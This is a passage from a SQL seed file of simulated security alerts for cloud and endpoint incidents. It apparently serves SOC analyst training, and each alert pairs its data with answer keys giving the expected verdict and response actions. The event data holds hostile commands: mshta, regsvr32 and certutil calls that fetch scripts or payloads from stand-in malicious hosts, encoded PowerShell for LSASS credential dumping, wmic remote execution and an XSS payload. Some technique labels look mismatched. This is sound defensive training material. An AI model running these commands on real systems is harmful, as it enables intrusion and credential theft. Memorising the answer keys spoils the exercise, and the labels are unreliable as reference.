/path/to/config\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Command linked to unauthorized access attempts\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"External IP accessed Kubernetes cluster, indicating potential lateral movement.\"}', 'Beginner', 'CLOUD', 3, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2062, 'Wiz Detection of Unauthorized Serverless Function Execution', 'medium', 'Wiz', 'An AWS Lambda function executed by an external IP not associated with any known entities. Potential unauthorized access detected.', 'Data Exfiltration', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:35:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.150\",\"dst_ip\":\"10.0.0.5\",\"username\":\"lambda_function_exec\",\"hostname\":\"aws-lambda\",\"request_body\":\"\",\"command_line\":\"aws lambda invoke --function-name sensitiveFunction\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.150\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with unauthorized AWS Lambda executions\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"aws lambda invoke --function-name sensitiveFunction\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Command associated with unauthorized data access\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Unauthorized execution of Lambda function indicating data exfiltration risk.\"}', 'Beginner', 'CLOUD', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2063, 'AWS S3 Bucket Data Leak Detected', 'critical', 'AWS GuardDuty', 'An external IP was observed accessing sensitive data from an S3 bucket. The activity is consistent with data exfiltration attempts.', 'Data Exfil', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:45:30Z\",\"event_type\":\"web_request\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"username\":\"jdoe\",\"hostname\":\"s3.amazonaws.com\",\"request_body\":\"GET /sensitive-data\",\"command_line\":\"\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for data exfiltration activities\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal user account\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The external IP accessing sensitive data indicates a breach attempt.\"}', 'Beginner', 'CLOUD', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2064, 'Azure IAM Privilege Escalation Detected', 'high', 'Azure Defender', 'A suspicious privilege escalation was detected in Azure IAM, potentially compromising administrator credentials.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:15:45Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"10.0.0.5\",\"username\":\"admin\",\"hostname\":\"azure.com\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP flagged for 1021 brute force attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"High-value target account\"}}],\"expected_actions\":[\"reset_credentials\",\"block_ip\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Failed login attempts from a foreign IP suggest a targeted credential compromise.\"}', 'Beginner', 'CLOUD', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(2065, 'GCP Service Account Hijacking Attempt', 'critical', 'GCP SCC', 'Unusual activity detected from a GCP service account indicating possible hijacking and unauthorized access.', 'Data Exfil', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:35:20Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.67\",\"dst_ip\":\"172.16.0.10\",\"username\":\"gcp-service-account\",\"hostname\":\"cloud.google.com\",\"request_body\":\"\",\"command_line\":\"gsutil cp gs://mybucket/sensitive-data .\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.67\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP involved in multiple unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"gsutil cp gs://mybucket/sensitive-data .\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command indicative of data exfiltration\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The execution of gsutil with an external IP suggests data exfiltration.\"}', 'Beginner', 'CLOUD', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2066, 'Prisma Cloud Kubernetes Misconfiguration Exploit', 'high', 'Prisma Cloud', 'A misconfigured Kubernetes cluster was detected and exploited to run unauthorized containers.', 'Lateral Movement', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:25:10Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.0.2.123\",\"dst_ip\":\"10.1.2.3\",\"username\":\"kube-admin\",\"hostname\":\"kubernetes.cluster.local\",\"request_body\":\"\",\"command_line\":\"kubectl run malicious-container --image=malicious-image\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.123\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"IP known for exploiting Kubernetes vulnerabilities\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"kubectl run malicious-container --image=malicious-image\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command used to deploy unauthorized containers\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of kubectl to run unauthorized containers indicates lateral movement.\"}', 'Beginner', 'CLOUD', 3, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2067, 'Wiz Serverless Function Exploit Detected', 'high', 'Wiz', 'A serverless function execution was detected with an anomalous and potentially harmful payload.', 'Web Attack', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T13:50:05Z\",\"event_type\":\"process_execution\",\"src_ip\":\"198.51.100.44\",\"dst_ip\":\"10.0.3.14\",\"username\":\"lambda-exec\",\"hostname\":\"aws.lambda.com\",\"request_body\":\"<script>alert(\'XSS\')</script>\",\"command_line\":\"node malicious.js\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.44\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple web attacks\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"<script>alert(\'XSS\')</script>\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"XSS payload detected\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The presence of an XSS payload in serverless function execution suggests a web attack.\"}', 'Beginner', 'CLOUD', 3, 1, 'ENERGY', NULL, NULL, NULL, 0),
(2068, 'AWS GuardDuty Detects S3 Bucket Data Leak Attempt', 'critical', 'AWS GuardDuty', 'An unauthorized data access attempt was detected on an S3 bucket. The source IP belongs to a known malicious actor. Immediate action is required to prevent data exfiltration.', 'Data Exfil', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:23:45Z\",\"event_type\":\"s3_data_access\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"username\":\"unauthorized_user\",\"hostname\":\"s3.amazonaws.com\",\"request_body\":\"GET /sensitive_data\",\"command_line\":\"aws s3 cp s3://bucket_name/sensitive_data .\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"unauthorized_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"Attempted access by unauthorized user\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"aws s3 cp s3://bucket_name/sensitive_data .\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command indicates potential data exfiltration attempt\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The source IP is known for malicious activities, and the command line indicates an unauthorized data transfer attempt.\"}', 'Beginner', 'CLOUD', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(2069, 'Azure Defender Detects Unusual IAM Privilege Escalation', 'high', 'Azure Defender', 'A user account attempted to gain privileged access using an unusual method, but the IP address appears to be from an internal range.', 'Credential Attack', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:45:32Z\",\"event_type\":\"privilege_escalation\",\"src_ip\":\"10.0.0.23\",\"dst_ip\":\"10.0.0.45\",\"username\":\"john.doe\",\"hostname\":\"azure-vm01\",\"command_line\":\"az role assignment create --assignee john.doe --role Contributor\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"IP address belongs to internal network\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"clean\",\"details\":\"User is a known employee with prior authorized access\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The activity was conducted within the internal network by a known user, indicating a false positive.\"}', 'Beginner', 'CLOUD', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2070, 'GCP SCC Alerts on Service Account Hijacking Attempt', 'medium', 'GCP SCC', 'A service account attempted unauthorized access from an unusual IP address, but the IP is from a trusted partner network.', 'Access Anomaly', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T13:57:18Z\",\"event_type\":\"service_account_access\",\"src_ip\":\"198.51.100.12\",\"dst_ip\":\"172.16.0.5\",\"username\":\"service-account-123\",\"hostname\":\"gcp-service\",\"command_line\":\"gcloud auth activate-service-account --key-file=/path/to/key.json\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"clean\",\"details\":\"IP address belongs to a trusted partner network\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"service-account-123\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"clean\",\"details\":\"Service account regularly used for inter-company data sharing\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The access was mistakenly flagged due to the IP address, which is from a trusted partner network.\"}', 'Beginner', 'CLOUD', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(2071, 'Prisma Cloud Detects Anomalous Kubernetes Pod Creation', 'medium', 'Prisma Cloud', 'An unexpected Kubernetes pod creation was detected, but it matches a known maintenance script signature.', 'Anomaly Detection', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T15:12:07Z\",\"event_type\":\"k8s_pod_creation\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"192.168.1.100\",\"username\":\"k8s-admin\",\"hostname\":\"k8s-cluster\",\"command_line\":\"kubectl apply -f maintenance-pod.yaml\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"IP address belongs to internal management network\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"kubectl apply -f maintenance-pod.yaml\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Procedures\",\"verdict\":\"clean\",\"details\":\"Command matches known maintenance script\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"anomaly_detection\",\"analysis_notes\":\"The pod creation event aligns with a scheduled maintenance activity, indicating a false positive.\"}', 'Beginner', 'CLOUD', 3, 1, 'ENERGY', NULL, NULL, NULL, 0),
(2072, 'Wiz Detects Potential Serverless Function Abuse', 'high', 'Wiz', 'An unusual spike in serverless function executions was detected, originating from an internal source. The activity matches a stress test pattern.', 'Anomaly Detection', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T17:39:29Z\",\"event_type\":\"serverless_execution\",\"src_ip\":\"192.168.2.30\",\"dst_ip\":\"192.168.2.60\",\"username\":\"devops-team\",\"hostname\":\"serverless-env\",\"command_line\":\"invoke stress-test\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Review\",\"verdict\":\"internal\",\"details\":\"IP belongs to internal DevOps team\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"invoke stress-test\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Procedures\",\"verdict\":\"clean\",\"details\":\"Command matches stress test procedure\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"anomaly_detection\",\"analysis_notes\":\"The serverless function spike was part of a planned stress test by the DevOps team, confirming a false positive.\"}', 'Beginner', 'CLOUD', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2073, 'Credential Dump from LSASS via PowerShell Encoded Command', 'critical', 'CrowdStrike', 'A PowerShell script was executed with an encoded command targeting LSASS to dump credentials. This activity is indicative of a sophisticated attack aiming for credential harvesting.', 'Credential Dumping', 'T1003', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T02:15:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"192.168.1.10\",\"username\":\"jdoe\",\"hostname\":\"Workstation-01\",\"command_line\":\"powershell.exe -enc aW1wb3J0LU1vZHVsZSBTZWN1cml0eS5OZXQ7IFtTeXN0ZW0uTmV0LlNlcnZpY2VQcm9jZXNzXTo6R2V0UHJvY2Vzc2VzKCJsc2FzcyIpLmV4aXQ=\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address within the corporate network.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -enc aW1wb3J0LU1vZHVsZSBTZWN1cml0eS5OZXQ7IFtTeXN0ZW0uTmV0LlNlcnZpY2VQcm9jZXNzXTo6R2V0UHJvY2Vzc2VzKCJsc2FzcyIpLmV4aXQ=\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Detected as a PowerShell command used in credential dumping attacks.\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The encoded PowerShell command is used to dump credentials from LSASS, a known technique employed by attackers for credential theft.\"}', 'Advanced', 'EDR', 7, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2074, 'Lateral Movement Detected via WMI Execution', 'high', 'SentinelOne', 'Suspicious WMI activity detected as an attacker attempts to move laterally between systems using WMI commands.', 'Lateral Movement', 'T1047', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T06:45:13Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.5\",\"dst_ip\":\"192.168.1.8\",\"username\":\"administrator\",\"hostname\":\"Server-03\",\"command_line\":\"wmic /node:192.168.1.8 process call create \\\"cmd.exe /c whoami\\\"\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address within the corporate network.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"wmic /node:192.168.1.8 process call create \\\"cmd.exe /c whoami\\\"\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"WMI command used for lateral movement within the network.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"WMI is commonly used for lateral movement by adversaries to execute commands on remote hosts without dropping files.\"}', 'Advanced', 'EDR', 7, 1, 'TECH', NULL, NULL, NULL, 0),
(2075, 'Fileless Malware Detected via MSHTA Execution', 'critical', 'Carbon Black', 'A fileless malware attack was detected using MSHTA to execute a malicious script in memory, bypassing traditional file-based detections.', 'Malware', 'T1218', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:30:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.15\",\"dst_ip\":\"192.168.2.20\",\"username\":\"mbrown\",\"hostname\":\"Workstation-07\",\"command_line\":\"mshta.exe http://malicious.site/script.hta\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address within the corporate network.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious.site/script.hta\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL hosting malicious HTA script used for fileless malware attacks.\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of MSHTA to execute a remote script is indicative of fileless malware, which executes in memory and often evades file-based detection methods.\"}', 'Advanced', 'EDR', 7, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2076, 'Suspicious Network Activity Indicative of Lateral Movement', 'high', 'Sysmon', 'Unusual internal network traffic patterns suggest lateral movement attempts within the network, potentially using compromised credentials.', 'Lateral Movement', 'T1076', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:22:10Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.3.45\",\"dst_ip\":\"192.168.3.50\",\"username\":\"svc_account\",\"hostname\":\"Server-12\",\"command_line\":null}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.3.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address within the corporate network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.3.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address within the corporate network.\"}}],\"expected_actions\":[\"collect_forensics\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The network traffic pattern between internal hosts suggests potential lateral movement, possibly indicating compromised credentials or a pivot attempt.\"}', 'Advanced', 'EDR', 7, 1, 'OT_ICS', NULL, NULL, NULL, 0),
(2077, 'Registry Modification via Regsvr32 for Persistence', 'high', 'CrowdStrike', 'Regsvr32 was used to execute a suspicious script, modifying registry settings to establish persistence on the host.', 'Persistence', 'T1112', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:55:05Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.4.30\",\"dst_ip\":\"192.168.4.30\",\"username\":\"hlee\",\"hostname\":\"Workstation-14\",\"command_line\":\"regsvr32 /s /n /u /i:http://malicious.example.com/script.sct scrobj.dll\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.4.30\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address within the corporate network.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious.example.com/script.sct\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL linked to a known malicious script used for persistence.\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Regsvr32 was leveraged to execute a remote script designed to modify registry settings, a common technique for establishing persistence on the host.\"}', 'Advanced', 'EDR', 7, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2078, 'Credential Dumping via LSASS Access Detected', 'critical', 'CrowdStrike', 'A suspicious process attempted to access LSASS memory for credential dumping. This indicates a potential attempt to extract credentials.', 'Credential Attack', 'T1003', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T02:34:56Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.102\",\"dst_ip\":\"192.168.1.105\",\"username\":\"admin_user\",\"hostname\":\"CORP-SERVER01\",\"command_line\":\"powershell.exe -enc ZWNobyBIZWxsbyBXb3JsZA==\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network Logs\",\"verdict\":\"internal\",\"details\":\"Source IP is an internal address on the corporate network\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -enc ZWNobyBIZWxsbyBXb3JsZA==\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command indicative of malicious activity\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The encoded PowerShell command indicates an attempt to dump credentials using a fileless method.\"}', 'Advanced', 'EDR', 7, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2079, 'Suspicious Lateral Movement via WMI Detected', 'high', 'SentinelOne', 'Lateral movement attempt detected using WMI from one internal server to another. This could indicate a hacker attempting to move within the network.', 'Lateral Movement', 'T1047', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T05:12:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.20\",\"dst_ip\":\"192.168.2.30\",\"username\":\"network_admin\",\"hostname\":\"CORP-DC01\",\"command_line\":\"wmic /node:192.168.2.30 process call create \'cmd.exe /c calc.exe\'\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network Logs\",\"verdict\":\"internal\",\"details\":\"Source IP is an internal address on the corporate network\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"wmic /node:192.168.2.30 process call create \'cmd.exe /c calc.exe\'\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"WMI command used for lateral movement with potential malicious intent\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of WMI commands to execute processes on a remote machine is indicative of lateral movement attempts.\"}', 'Advanced', 'EDR', 7, 1, 'TECH', NULL, NULL, NULL, 0),
(2080, 'Fileless Malware Activity Detected via Encoded PowerShell', 'critical', 'Carbon Black', 'Detected execution of encoded PowerShell indicative of fileless malware activity. This could be an attempt to execute malicious scripts in memory.', 'Malware', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:45:15Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.55\",\"dst_ip\":\"192.168.1.60\",\"username\":\"sysadmin\",\"hostname\":\"WORKSTATION-12\",\"command_line\":\"powershell.exe -enc aQBlAHgAIAB8ACAAZgBvAFIAZQBhAGMAaAAgACgAJABjAG8AbQBtAGEAbgBkADoAUABvAHcAZQByAFMAaABlAGwAbAAgAC0AZQBuAGMAIAAtAHYAcgBlAGIAOwApAHwAIAAtAGYAcgBlAGUAbwBlAGQAKQAgAH0A\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network Logs\",\"verdict\":\"internal\",\"details\":\"Source IP is an internal address on the corporate network\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -enc aQBlAHgAIAB8ACAAZgBvAFIAZQBhAGMAaAAgACgAJABjAG8AbQBtAGEAbgBkADoAUABvAHcAZQByAFMAaABlAGwAbAAgAC0AZQBuAGMAIAAtAHYAcgBlAGIAOwApAHwAIAAtAGYAcgBlAGUAbwBlAGQAKQAgAH0A\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command associated with known fileless malware techniques\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The PowerShell command is characteristic of fileless malware, which executes scripts directly in memory.\"}', 'Advanced', 'EDR', 7, 1, 'ENERGY', NULL, NULL, NULL, 0),
(2081, 'Malicious Network Connection Detected to Known C2 Server', 'high', 'Sysmon', 'A network connection was established with a known command and control server. This is indicative of potential malware communication or data exfiltration.', 'Data Exfiltration', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T15:23:12Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.5.100\",\"dst_ip\":\"203.0.113.25\",\"username\":\"jdoe\",\"hostname\":\"CLIENT-XY\",\"request_body\":\"N/A\",\"command_line\":\"certutil.exe -urlcache -split -f http://malicious-server.com/payload.exe\"}', '2026-03-16 03:19:16', '2026-03-16 03:19:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for hosting malware\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"certutil.exe -urlcache -split -f http://malicious-server.com/payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid 